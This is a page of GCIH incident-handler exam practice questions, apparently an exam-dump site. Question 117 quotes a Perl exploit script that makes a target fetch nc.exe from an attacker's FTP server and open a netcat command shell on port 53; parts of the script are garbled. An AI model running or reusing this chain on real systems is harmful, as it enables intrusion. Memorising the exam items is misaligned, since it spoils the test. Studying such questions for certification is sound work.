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The GCIH Certification Exam is designed for professionals who are responsible for detecting, responding to, and recovering from security incidents. It is intended for individuals who are in roles such as incident responders, security analysts, security architects, security engineers, and network administrators. GIAC Certified Incident Handler certification exam covers topics such as incident handling process, threat intelligence, network analysis, malware analysis, and forensics.

>> GCIH Real Question <<

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GIAC Certified Incident Handler Sample Questions (Q117-Q122):

NEW QUESTION # 117

Adam, a malicious hacker performs an exploit, which is given below:

```
#####  
$port = 53;  
# Spawn cmd.exe on port X  
$your = "192.168.1.1";# Your FTP Server 89  
$user = "Anonymous";# login as  
$pass = 'noone@nowhere.com';# password  
#####  
$host = $ARGV[0];  
print "Starting ... \n";  
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
```

```

open $your >sasfile\"); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\"); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"); system("perl msadc.pl -
h $host -C \"echo get nc.exe>>sasfile\"); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\sasfile\"); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$0=; print "Opening ... \n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"); print "Done.\n"; #system("telnet $host $port");
exit(0);

```

Which of the following is the expected result of the above exploit?

- A. Opens up a telnet listener that requires no username or password
- B. Creates a share called "sasfile" on the target system
- C. Opens up a SMTP server that requires no username or password
- D. Creates an FTP server with write permissions enabled

Answer: A

NEW QUESTION # 118

Which of the following are based on malicious code?

Each correct answer represents a complete solution. Choose two.

- A. Denial-of-Service (DoS)
- B. Worm
- C. Biometrics
- D. Trojan horse

Answer: B,D

NEW QUESTION # 119

Which of the following steps can be taken as countermeasures against sniffer attacks?

Each correct answer represents a complete solution. Choose all that apply.

- A. Reduce the range of the network to avoid attacks into wireless networks.
- B. Use encrypted protocols for all communications.
- C. Use tools such as StackGuard and Immunix System to avoid attacks.
- D. Use switches instead of hubs since they switch communications, which means that information is delivered only to the predefined host.

Answer: A,B,D

Explanation:

Section: Volume C

NEW QUESTION # 120

You work as a System Administrator for Happy World Inc. Your company has a server named uC1 that runs Windows Server 2008. The Windows Server virtualization role service is installed on the uC1 server which hosts one virtual machine that also runs Windows Server 2008. You are required to install a new application on the virtual machine. You need to ensure that in case of a failure of the application installation, you are able to quickly restore the virtual machine to its original state.

Which of the following actions will you perform to accomplish the task?

- A. Use the Virtualization Management Console to create a snapshot of the virtual machine.
- B. Log on to the virtual host and create a new dynamically expanding virtual hard disk.
- C. Use the Edit Virtual Hard Disk Wizard to copy the virtual hard disk of the virtual machine.
- D. Use the Virtualization Management Console to save the state of the virtual machine.

Answer: A

